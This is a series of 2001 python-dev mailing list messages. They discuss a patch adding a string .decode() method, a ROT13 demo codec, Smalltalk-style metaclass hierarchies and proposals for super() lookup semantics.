References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> Message-ID: <3AF0662D.48671B4E@lemburg.com> Guido van Rossum wrote: > > > > Can you provide examples of where this can't be done using the > > > existing approach? > > > > There is no existing elegant approach except hooking up to the > > codecs directly. Adding .decode() is really a matter of adding > > symmetry. > > Yes, but symmetry is good except when it isn't. :-) > > > Here are some example of how these two codec methods could > > be used: > > > > xmltext = binarydata.encode('base64') > > ... > > binarydata = xmltext.decode('base64') > > > > zzz = data.encode('gzip') > > ... > > data = zzz.decode('gzip') > > > > jpegimage = gifimage.decode('gif').encode('jpeg') > > > > mp3audio = wavaudio.decode('wav').encode('mp3') > > > > etc. > > How would you do this currently? By looking up the codecs using the codec registry and then calling them directly. > > Basically all content transfer encodings can take advantage of > > these two methods. > > > > It's not really code bloat, BTW, since the C API is there; > > the .decode() method would just expose it. > > Show me the patch and I'll decide whether it's code bloat. :-) I've attached the patch. 
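For readers following along today, here is a sketch of two things in this exchange: the "existing approach" MAL describes (look a codec up in the registry and call it directly), and the logic of the patch's PyString_AsDecodedString(). That logic is: decode, convert a Unicode result back to a string, and reject anything else. This is a hedged Python 3 sketch, not the 2001 C code. It assumes the bytes-to-bytes 'base64' and 'zlib' codecs of modern Python, and as_decoded_bytes() is a hypothetical name used only for illustration.

```python
import codecs

payload = b"binary \x00\xff payload"

# The registry route: look the codec up, then call its functions directly.
# Codec functions return a tuple (output, number of input bytes consumed).
info = codecs.lookup("base64")
encoded, consumed = info.encode(payload)
decoded, _ = info.decode(encoded)
assert decoded == payload and consumed == len(payload)


def as_decoded_bytes(data, encoding, errors="strict"):
    """Hypothetical Python 3 analogue of the patch's PyString_AsDecodedString()."""
    if not isinstance(data, bytes):
        raise TypeError("bad argument type")
    result = codecs.decode(data, encoding, errors)
    # As in the patch, convert a Unicode (str) result back to a byte string
    # with a default encoding: UTF-8 here, where Python 2.x used ASCII.
    if isinstance(result, str):
        result = result.encode("utf-8")
    if not isinstance(result, bytes):
        raise TypeError("decoder did not return a string object (type=%s)"
                        % type(result).__name__)
    return result


print(as_decoded_bytes(b"aGVsbG8=\n", "base64"))                 # b'hello'
print(as_decoded_bytes(codecs.encode(b"spam", "zlib"), "zlib"))  # b'spam'
```

Python 3 restricts bytes.decode() and str.encode() to text encodings. For codecs like 'base64' it raises LookupError and points the caller at codecs.decode() instead.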
Due to a small reorganisation the patch is a little longer -- symmetry has its price at C level too ;-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ -------------- next part -------------- --- CVS-Python/Include/stringobject.h Sat Feb 24 10:30:49 2001 +++ Dev-Python/Include/stringobject.h Wed May 2 21:05:12 2001 @@ -105,10 +105,19 @@ extern DL_IMPORT(PyObject*) PyString_AsE PyObject *str, /* string object */ const char *encoding, /* encoding */ const char *errors /* error handling */ ); +/* Decodes a string object and returns the result as Python string + object. */ + +extern DL_IMPORT(PyObject*) PyString_AsDecodedString( + PyObject *str, /* string object */ + const char *encoding, /* encoding */ + const char *errors /* error handling */ + ); + /* Provides access to the internal data buffer and size of a string object or the default encoded version of an Unicode object. Passing NULL as *len parameter will force the string buffer to be 0-terminated (passing a string with embedded NULL characters will cause an exception). 
*/ --- CVS-Python/Objects/stringobject.c Wed May 2 16:19:22 2001 +++ Dev-Python/Objects/stringobject.c Wed May 2 21:04:34 2001 @@ -138,42 +138,56 @@ PyString_FromString(const char *str) PyObject *PyString_Decode(const char *s, int size, const char *encoding, const char *errors) { - PyObject *buffer = NULL, *str; + PyObject *v, *str; + + str = PyString_FromStringAndSize(s, size); + if (str == NULL) + return NULL; + v = PyString_AsDecodedString(str, encoding, errors); + Py_DECREF(str); + return v; +} + +PyObject *PyString_AsDecodedString(PyObject *str, + const char *encoding, + const char *errors) +{ + PyObject *v; + + if (!PyString_Check(str)) { + PyErr_BadArgument(); + goto onError; + } if (encoding == NULL) encoding = PyUnicode_GetDefaultEncoding(); /* Decode via the codec registry */ - buffer = PyBuffer_FromMemory((void *)s, size); - if (buffer == NULL) - goto onError; - str = PyCodec_Decode(buffer, encoding, errors); - if (str == NULL) + v = PyCodec_Decode(str, encoding, errors); + if (v == NULL) goto onError; /* Convert Unicode to a string using the default encoding */ - if (PyUnicode_Check(str)) { - PyObject *temp = str; - str = PyUnicode_AsEncodedString(str, NULL, NULL); + if (PyUnicode_Check(v)) { + PyObject *temp = v; + v = PyUnicode_AsEncodedString(v, NULL, NULL); Py_DECREF(temp); - if (str == NULL) + if (v == NULL) goto onError; } - if (!PyString_Check(str)) { + if (!PyString_Check(v)) { PyErr_Format(PyExc_TypeError, "decoder did not return a string object (type=%.400s)", - str->ob_type->tp_name); - Py_DECREF(str); + v->ob_type->tp_name); + Py_DECREF(v); goto onError; } - Py_DECREF(buffer); - return str; + return v; onError: - Py_XDECREF(buffer); return NULL; } PyObject *PyString_Encode(const char *s, int size, @@ -1773,10 +1780,29 @@ string_encode(PyStringObject *self, PyOb return NULL; return PyString_AsEncodedString((PyObject *)self, encoding, errors); } +static char decode__doc__[] = +"S.decode([encoding[,errors]]) -> string\n\ +\n\ +Return a decoded 
string version of S. Default encoding is the current\n\ +default string encoding. errors may be given to set a different error\n\ +handling scheme. Default is 'strict' meaning that encoding errors raise\n\ +a ValueError. Other possible values are 'ignore' and 'replace'."; + +static PyObject * +string_decode(PyStringObject *self, PyObject *args) +{ + char *encoding = NULL; + char *errors = NULL; + if (!PyArg_ParseTuple(args, "|ss:decode", &encoding, &errors)) + return NULL; + return PyString_AsDecodedString((PyObject *)self, encoding, errors); +} + + static char expandtabs__doc__[] = "S.expandtabs([tabsize]) -> string\n\ \n\ Return a copy of S where all tab characters are expanded using spaces.\n\ If tabsize is not given, a tab size of 8 characters is assumed."; @@ -2347,10 +2373,11 @@ string_methods[] = { {"title", (PyCFunction)string_title, 1, title__doc__}, {"ljust", (PyCFunction)string_ljust, 1, ljust__doc__}, {"rjust", (PyCFunction)string_rjust, 1, rjust__doc__}, {"center", (PyCFunction)string_center, 1, center__doc__}, {"encode", (PyCFunction)string_encode, 1, encode__doc__}, + {"decode", (PyCFunction)string_decode, 1, decode__doc__}, {"expandtabs", (PyCFunction)string_expandtabs, 1, expandtabs__doc__}, {"splitlines", (PyCFunction)string_splitlines, 1, splitlines__doc__}, #if 0 {"zfill", (PyCFunction)string_zfill, 1, zfill__doc__}, #endif From mal at lemburg.com Wed May 2 22:36:30 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 22:36:30 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> Message-ID: <3AF06FCE.854D4DF7@lemburg.com> Here's a little fun codec to play with. It encodes the input using the ROT13 encoding (which is 1-1 and idempotent). 
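MAL's rot_13.py attachment was scrubbed from the archive. What follows is therefore not his code but a minimal Python 3 sketch of the same idea. It assumes a search function registered with codecs.register() and uses a hypothetical codec name, 'my_rot13'. Strictly speaking, ROT13 is its own inverse rather than idempotent: applying it twice restores the input. That is why one function can serve as both encoder and decoder.

```python
import codecs
import string

# Hypothetical codec name, used only for this sketch.
CODEC_NAME = "my_rot13"

# Translation table rotating each ASCII letter 13 places; other characters pass through.
_ROT13 = str.maketrans(
    string.ascii_lowercase + string.ascii_uppercase,
    string.ascii_lowercase[13:] + string.ascii_lowercase[:13]
    + string.ascii_uppercase[13:] + string.ascii_uppercase[:13],
)


def rot13(text, errors="strict"):
    # Codec functions return (output, number of input items consumed).
    # ROT13 is its own inverse, so this serves as both encoder and decoder.
    return text.translate(_ROT13), len(text)


def search(name):
    # The registry passes a normalized, lower-case encoding name.
    if name == CODEC_NAME:
        return codecs.CodecInfo(encode=rot13, decode=rot13, name=CODEC_NAME)
    return None


codecs.register(search)

secret = codecs.encode("Here's a little fun codec", CODEC_NAME)
print(secret)                             # Urer'f n yvggyr sha pbqrp
print(codecs.decode(secret, CODEC_NAME))  # Here's a little fun codec
```

Python 3 also ships a str-to-str 'rot13' codec, so codecs.encode("abc", "rot13") returns "nop" without any registration.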
The main difference over the existing codecs is that it returns a string rather than Unicode. To install it, simply place it in some directory on your Python path. Here's some sample output (Netscape can unscramble this BTW): """ Urer'f n yvggyr sha pbqrp gb cynl jvgu. Vg rapbqrf gur vachg hfvat gur EBG13 rapbqvat (juvpu vf 1-1 naq vqrzcbgrag). Gur znva qvssrerapr bire gur rkvfgvat pbqrpf vf gung vg ergheaf n fgevat engure guna Havpbqr. Gb vafgnyy vg, fvzcyl cynpr vg va fbzr qverpgbel ba lbhe Clguba cngu. """ -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ -------------- next part -------------- A non-text attachment was scrubbed... Name: rot_13.py Type: text/python Size: 2066 bytes Desc: not available URL: From guido at digicool.com Thu May 3 00:11:07 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 17:11:07 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 13:12:21 +0200." <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook> References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook> Message-ID: <200105022211.RAA05242@cj20424-a.reston1.va.home.com> > [From Jim Althoff] > > In the list below, indentation indicates class hieararchy (superclass -- > > subclass) > The indentation, unfortunately, seems to be destroyed. [...] > A question for Jim (this is more Smalltalk than Python related): > How does the Behaviour class fit into this picture? Jim responded with a much clearer diagram, and as a bonus an answer to your question about Behaviour! > Hi Guido, > > Sorry about the mangled diagram. It's kind of tricky doing this with just > text. :-) Anyway, below is a -- hopefully -- improved diagram and > description. > > At the very bottom is an answer to the question about "Behavior". 
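Jim Althoff's message lays out the Smalltalk-80 arrangement: a class hierarchy plus a parallel metaclass hierarchy, with "class methods" living in the metaclass. This can be roughly approximated in Python 3 with explicit metaclasses. The sketch below uses RectangleMeta, SpamRectangleMeta and unit() as illustrative names. Unlike Smalltalk, Python does not create a metaclass per class automatically, so each one is written out by hand here.

```python
class RectangleMeta(type):
    """Stands in for Smalltalk's RectangleMetaClass: holds class-side methods."""

    def unit(cls):
        # A "class method": invoked on the class object, receives the class.
        return cls(1, 1)


class SpamRectangleMeta(RectangleMeta):
    """Stands in for SpamRectangleMetaClass, a subclass of RectangleMetaClass."""


class Rectangle(metaclass=RectangleMeta):
    def __init__(self, width, height):
        self.width = width
        self.height = height

    def area(self):
        # An "instance method": lives in Rectangle's own __dict__.
        return self.width * self.height


class SpamRectangle(Rectangle, metaclass=SpamRectangleMeta):
    pass


# Two parallel hierarchies, linked by "instance of":
assert issubclass(SpamRectangle, Rectangle)
assert issubclass(SpamRectangleMeta, RectangleMeta)
assert type(Rectangle) is RectangleMeta
assert type(SpamRectangle) is SpamRectangleMeta

# Class-side methods are found through the metaclass, not on instances.
square = SpamRectangle.unit()
assert isinstance(square, SpamRectangle) and square.area() == 1
assert not hasattr(Rectangle(2, 3), "unit")

# The chain ends with type being an instance of itself.
assert type(type) is type
```

In everyday Python, @classmethod usually covers the class-side-method case without a metaclass. Also, type being an instance of itself is closer to the Smalltalk-76 arrangement Jim mentions than to Smalltalk-80's MetaClass/MetaClassMetaClass loop.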
> > Jim > > ========================================== > > Smalltalk-80 (simplified) class/metaclass structure: > > Terminology: > o A "class" is an object that can be instantiated. > o A "metaclass" is a class and is one such that when _it_ is instantiated > _that_ instance is _itself_ a class (which can be instantiated). > (A metaclass is a specialization of class). > > Essentially, there are two parallel hierarchies: 1) the class hierarchy > and 2) the metaclass hierarchy. The class hierarchy starts with class > Object. The metaclass hierarchy starts right below Class with the > metaclass ObjectMetaClass. > > > o Object > o Class > o MetaClass > o ObjectMetaClass > o ClassMetaClass > o MetaClassMetaClass > > Object is the top of the class hierarchy (and total hierarchy). It has no > superclass. It is the only class that has no superclass. > Class is a subclass of Object. > MetaClass is a subclass of Class. > > ObjectMetaClass is also a subclass of Class. > ClassMetaClass is a subclass of ObjectMetaClass. > MetaClassMetaClass is a subclass of ClassMetaClass. > > Adding in application classes Rectangle and SpamRectangle then might look > like: > > > o Object > o Class > o MetaClass > o ObjectMetaClass > o ClassMetaClass > o MetaClassMetaClass > o RectangleMetaClass > o SpamRectangleMetaClass > o Rectangle > o SpamRectangle > > Rectangle is a subclass of Object. > SpamRectangle is a subclass of Rectangle. > > RectangleMetaClass is a subclass of ObjectMetaClass. > SpamRectangleMetaClass is a subclass of RectangleMetaClass. > > Rectangle is an instance of RectangleMetaClass. > SpamRectangle is an instance of SpamRectangleMetaClass. > (SpamRectangleMetaClass is an instance of MetaClass.) > > The next list shows both the subclass- and the instanceOf- relationships > between classes and metaclasses. > > In this list a class listed below another class is a subclass of it. 
> SpamMC is an abbreviation for SpamMetaClass (the metaclass of class Spam -- > the class of which class Spam is an instance). > > Class > Object instanceOf ObjectMC instanceOf MetaClass > Class instanceOf ClassMC instanceOf MetaClass > MetaClass instanceOf MetaClassMC instanceOf MetaClass > > ObjectMetaClass, ClassMetaClass, and MetaClassMetaClass are all instances > of MetaClass. > > MetaClass is an instance of MetaClassMetaClass But MetaClassMetaClass is > an instance of MetaClass. So this particular relationship is circular. > (In Smalltalk-76, Class was an instance of itself.) > > Application classes would have a similar, parallel hierarchy between > classes and their associated metaclasses. For example: > > Object instanceOf ObjectMC instanceOf MetaClass > Rectangle instanceOf RectangleMC instanceOf MetaClass > SpamRectangle instanceOf SpamRectangleMC instanceOf MetaClass > > When you create class SpamRectangle as a subclass of class Rectangle, the > code in the class-creation method first creates the metaclass > SpamRectangleMetaClass -- by instantiating MetaClass -- as a subclass of > RectangleMetaClass. The code then creates the SpamRectangle class as an > instance of the SpamRectangleMetaClass metaclass it just created. > > You can then create instances of class SpamRectangle. > > SpamRectangle "instance methods" reside in the method dict of > SpamRectangle. > SpamRectangle "class methods" reside in the method dict of > SpamRectangleMetaClass. > > ============================ > > Regarding Thomas' question: > > The Smalltalk-80 class hierarchy actually has a bit more factoring than > what I show above. In particular, Class and MetaClass are subclasses of > the class ClassDescription. ClassDescription is a subclass of class > Behavior. Behavior is a subclass of Object. 
> > So it looks like: > > > o Object > o Behavior > o ClassDescription > o MetaClass > o Class > o ObjectMetaClass > o BehaviorMetaClass > o ClassDescriptionMetaClass > o MetaClassMetaClass > o ClassMetaClass > > Class Behavior basically abstracts the creation and handling of method > dict.s. Class ClassDescription factors out common, reusable code between > MetaClass and Class. Clearly there are a number of ways of designing (or > over-designing ) this part of the hierarchy. The key idea, though, > was to use the subclassing mechanism as a way of supporting specialized > class methods. > > ============================= --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Wed May 2 23:24:28 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 2 May 2001 17:24:28 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Doc/lib libfuncs.tex,1.76,1.77 In-Reply-To: Message-ID: [Fred L. Drake] > Update the filter() and list() descriptions to include information > about the support for containers and iteration. > ... > \begin{funcdesc}{list}{sequence} > ! Return a list whose items are the same and in the same order as > ! \var{sequence}'s items. \var{sequence} may be either a sequence, > ! a container that supports iteration, or an iterator object. > ... [and similarly for filter()] Before we repeat this last incantation umpteen more times in the docs, is this how we want it to read in the end? The truth of the implementation and of the design is that "sequence" is any object that supports iteration, period (if PyObject_GetIter(op) succeeds, list(op) etc are happy, else they raise TypeError). "A sequence" and "an iterator object" *always* support iteration, so naming them too appears to draw a distinction that doesn't exist. Suggested alternative: \var{sequence} must support iteration (see XXX).
where XXX is common boilerplate explaining what "support iteration" means, and that sequences and iterator objects are just particular cases of that. Note that this boilerplate may expand to include generators too before 2.2 is real, and a generator isn't really "a container that supports iteration" (the word "container" is a strain in the generator context). That is, a long-winded incantation is just going to get longer over time, and if it's repeated umpteen places in the docs I doubt they'll all get updated when needed. From michel at digicool.com Wed May 2 23:43:42 2001 From: michel at digicool.com (Michel Pelletier) Date: Wed, 2 May 2001 14:43:42 -0700 (PDT) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105022211.RAA05242@cj20424-a.reston1.va.home.com> Message-ID: On Wed, 2 May 2001, Guido van Rossum wrote: > > > > o Object > > o Class > > o MetaClass > > o ObjectMetaClass > > o ClassMetaClass > > o MetaClassMetaClass > > > > Object is the top of the class hierarchy (and total hierarchy). It has no > > superclass. It is the only class that has no superclass. > > Class is a subclass of Object. > > MetaClass is a subclass of Class. > > > > ObjectMetaClass is also a subclass of Class. > > ClassMetaClass is a subclass of ObjectMetaClass. > > MetaClassMetaClass is a subclass of ClassMetaClass. Does this go on ad infinitum? ie, is there a ClassMetaClassMetaClass which sublcasses MetaClassMetaClass and so on? I was under the impression from talking to JimF that Smalltalk eventually stopped at a class that is a subclass of itself. -Michel From greg at cosc.canterbury.ac.nz Thu May 3 03:35:29 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 13:35:29 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <3AEFCEBD.2E5979C9@lemburg.com> Message-ID: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz> "M.-A. 
Lemburg" : > I'm not sure I can follow you here: DictType.__repr__ is the > representation method of the dictionary and not inherited > from TypeType, so there should be no problem. The problem is that DictType.__repr__ could mean either the unbound method for finding the repr of a dictionary, or the bound method for finding the repr of DictType itself. This ambiguity is inherent in the Python language as soon as you try to make classes into instances (which you have to do as a consequence of making types into classes). Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 3 05:15:41 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 15:15:41 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Message-ID: <200105030315.PAA16465@s454.cosc.canterbury.ac.nz> Michel Pelletier : > I was under the impression > from talking to JimF that Smalltalk eventually stopped at a class > that is a subclass of itself. Some years ago, while playing with Sun's Postscript-based NeWS window system, I devised an OO language (called P) that got translated into PostScript. It had a very Smalltalk-like class/metaclass system, although rather simpler than what JimF described. As I remember, the kernel consisted of a little knot of about 6 classes with some interesting incestuous relationships between them. If anyone's interested, I could dig out the code and provide details of how it all worked. There might be some ideas that could be used in Python. (Programming in P felt a lot like programming in Python, by the way. If my name had been Guido, who knows where it might have led!) 
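Greg's DictType.__repr__ ambiguity becomes real once classes are also instances. Below is a minimal Python 3 sketch of how it was eventually resolved. Attribute lookup on a class finds the method meant for its instances, while repr() and the other special-method hooks look the method up on type(obj). As a result, a class's own repr comes from its metaclass. Meta and Point are illustrative names.

```python
# Every class is itself an object: an instance of its metaclass (type by default).
assert isinstance(dict, type) and type(dict) is type

d = {"a": 1}

# Looking __repr__ up on the class finds the method for dict *instances*...
assert dict.__repr__(d) == "{'a': 1}"

# ...while the repr of the class object itself is supplied by its metaclass.
assert type.__repr__(dict) == "<class 'dict'>"

# repr() avoids the ambiguity by looking __repr__ up on type(obj), never on obj.
assert repr(d) == "{'a': 1}"
assert repr(dict) == "<class 'dict'>"


# The same holds for user-defined classes with a custom metaclass.
class Meta(type):
    def __repr__(cls):
        return f"<Meta class {cls.__name__}>"


class Point(metaclass=Meta):
    def __repr__(self):
        return "Point()"


assert repr(Point) == "<Meta class Point>"   # from Meta.__repr__
assert repr(Point()) == "Point()"            # from Point.__repr__
assert Point.__repr__(Point()) == "Point()"  # attribute access picks the instance method
```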
Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 3 05:25:12 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 15:25:12 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <3AEFF710.9471.8025D7EA@localhost> Message-ID: <200105030325.PAA16469@s454.cosc.canterbury.ac.nz> Gordon McMillan : > I would like to see ... some discussion of the expected > pragmatic benefits. (That's a different topic from subclassing > types.) Actually, it's not -- the two issues are connected. Suppose we succeed in unifying types and classes. Then instead of classes being of type ClassType, they are now instances of ClassClass. So classes are also instances, or in other words, we have unified classes and instances. So even if we don't go as far as adding Smalltalk-style class-methods-via-metaclasses, we still have to deal with the fact that some things will be both classes and instances. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 3 05:27:34 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 15:27:34 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105021523.KAA32340@cj20424-a.reston1.va.home.com> Message-ID: <200105030327.PAA16472@s454.cosc.canterbury.ac.nz> Guido: > Actually, I think that what's in the __dict__ is just perfect I was thinking of backwards compatibility for people who are hacking the __dict__ of a class directly. 
If you don't care about that, the problem is simpler. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 3 05:39:08 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 15:39:08 +1200 (NZST) Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk) In-Reply-To: <200105021511.KAA32271@cj20424-a.reston1.va.home.com> Message-ID: <200105030339.PAA16476@s454.cosc.canterbury.ac.nz> Guido: > Will we need to add a "::" operator to Python??? If so, I hope we can find a syntax that doesn't remind one of C++ so much... I have an idea! How about spelling super(self, MyBaseClass) as MyBaseClass[self] This can be thought of as a sort of "cast" which turns self into an object which behaves like it were an instance of MyBaseClass. Then we can write MyBaseClass[self].foo(args) Advantages: * Concise and uncluttered * No new syntax needed * Can be implemented using existing mechanisms * Doesn't even remotely resemble anything in C++ :-) Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From tim.one at home.com Thu May 3 07:49:04 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 3 May 2001 01:49:04 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <3AF01381.592AE31B@lemburg.com> Message-ID: [MAL, on basemethods] > ... > In other words: you let Python continue the search for the method > as if it hadn't found the occurrance calling the bsaemethod() > API. Hmm, still not clear enough... 
better let Tim jump in here > (we've had a discussion about basemethod() some months or years > ago). Tim ? Sorry, I'm not sure what either of you is talking about. In class A(B, C): def foo(self): super.foo() Guido said that super would start searching at B, but I don't know what your "continue the search for the method as if it hadn't found the occurrance calling the bsaemethod() API" means: defining what a thing does in terms of an unspecified API it doesn't use is a pretty sure recipe for compounded confusion . Given that we're using Python's search rules, the ambiguous point remaining is whether: super.f() textually contained in a method of class K begins searching with: 1) K.__bases__ or with: 2) self.__class__.__bases__ Java uses #1, and Guido's "the search starts with B" implies that he would too. But it's unclear whether he meant that. Given also class D(A): def foo(self): super.foo() D().foo() both views agree that D.foo() is invoked first, and that D.foo() invokes A.foo() next. But under #1 A.foo() invokes C.foo() or D.foo() next, while under #2 A.foo() invokes A.foo() again. Multiple inheritance is a red herring here -- take C out of A's bases, and the same ambiguity needs to be resolved. From greg at cosc.canterbury.ac.nz Thu May 3 07:56:07 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 17:56:07 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Message-ID: <200105030556.RAA16509@s454.cosc.canterbury.ac.nz> Tim: > Java uses #1, and Guido's "the search starts with B" implies that he would > too. But it's unclear whether he meant that. It's the only sane thing for him to mean, as far as I can see. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. 
| greg at cosc.canterbury.ac.nz +--------------------------------------+ From pf at artcom-gmbh.de Thu May 3 08:29:03 2001 From: pf at artcom-gmbh.de (Peter Funk) Date: Thu, 3 May 2001 08:29:03 +0200 (MEST) Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk) In-Reply-To: <200105030339.PAA16476@s454.cosc.canterbury.ac.nz> from Greg Ewing at "May 3, 2001 3:39: 8 pm" Message-ID: Hi, Greg Ewing: [...] > How about spelling super(self, MyBaseClass) as > > MyBaseClass[self] > > This can be thought of as a sort of "cast" which turns self > into an object which behaves like it were an instance of > MyBaseClass. Then we can write > > MyBaseClass[self].foo(args) > > Advantages: > * Concise and uncluttered > * No new syntax needed > * Can be implemented using existing mechanisms > * Doesn't even remotely resemble anything in C++ :-) Disadvantages: * People will confuse this with calling MyBaseClass.__getitem__(....) * Doesn't even remotely resemble anything in C++ We have to face it: I myself don't like C++ either, but a *lot* of people today are already familar with C++ today. Giving them something they are already familar with, will make it easier to convert some of them to Python. To Greg: This '::' operator is not at all that ugly and AFAI can see would not introduce any backward incompatible change to the language. I'm sure C++ has some other real warts to offer that we both don't want to see in a future version of Python. Right? Regards, Peter -- Peter Funk, Oldenburger Str.86, D-27777 Ganderkesee, Germany, Fax:+49 4222950260 office: +49 421 20419-0 (ArtCom GmbH, Grazer Str.8, D-28359 Bremen, Germany) From mal at lemburg.com Thu May 3 09:49:37 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 03 May 2001 09:49:37 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz> Message-ID: <3AF10D91.802C8555@lemburg.com> Greg Ewing wrote: > > "M.-A. 
Lemburg" : > > > I'm not sure I can follow you here: DictType.__repr__ is the > > representation method of the dictionary and not inherited > > from TypeType, so there should be no problem. > > The problem is that DictType.__repr__ could mean either > the unbound method for finding the repr of a dictionary, > or the bound method for finding the repr of DictType > itself. > > This ambiguity is inherent in the Python language as soon > as you try to make classes into instances (which you have > to do as a consequence of making types into classes). We are actually trying to turn classes into types here :-) Really, I think that we could resolve this issue by not inheriting from meta-classes. DictType is a creation of the meta-class TypeType. I'm not calling these instances to prevent additional confusion. The root of the problem is that for some reason there is belief that DictType should implicitly inherit attributes and methods from TypeType. If we simply say that there is no implicit inheritance (only explicit one), then these problems should go away. Some of these ideas are burried in the "super" part of this thread. Unfortunately this concept doesn't go very far since Python has multiple inheritance and thus the term "super" (referring to the class' single base class) is not well-defined. As Jim mentioned in his reply to Thomas' question, SmallTalk has two parallel hierarchies. One for the classes and one for the meta-classes. If we follow the same path in Python and keep the two well separated, I think we can resolve many of the issues which are currently showing up. To link the two hierarchies together we don't need a "super" concept, but instead a way to reach the meta-class in charge of a class, say "klass.__creator__". Note that there's another issue hiding in all this and again this is due to multiple inheritance: which meta-class is in charge of a class which is derived from two classes having different meta-classes ? 
meta1 --> o klass1 o klass1a o klass1b meta2 --> o klass2 o klass2a o klass2b class klass3(klass1a, klass2b): ... I think there's no clean way to resolve this, so I'd suggest to simply rule this out and declare it illegal (class can only be based on classes having the same meta-class). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From barry at digicool.com Thu May 3 10:24:16 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Thu, 3 May 2001 04:24:16 -0400 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com> Message-ID: <15089.5552.164307.344721@anthem.wooz.org> >>>>> "M" == M writes: M> Here's a little fun codec to play with. It encodes the input M> using the ROT13 encoding (which is 1-1 and idempotent). LOL! Guess what `language' I chose to use when testing Mailman's i18n support? :) -Barry From fredrik at pythonware.com Thu May 3 10:11:10 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Thu, 3 May 2001 10:11:10 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com> Message-ID: <028a01c0d3a8$9e05f190$e46940d5@hagrid> mal wrote: > Here's some sample output (Netscape can unscramble this BTW): heh. just discovered that outlook express can deal with this too -- but only if the message comes from the usenet. on ordinary mail, the "unscramble rot13" menu entry is disabled (too much usability testing?) 
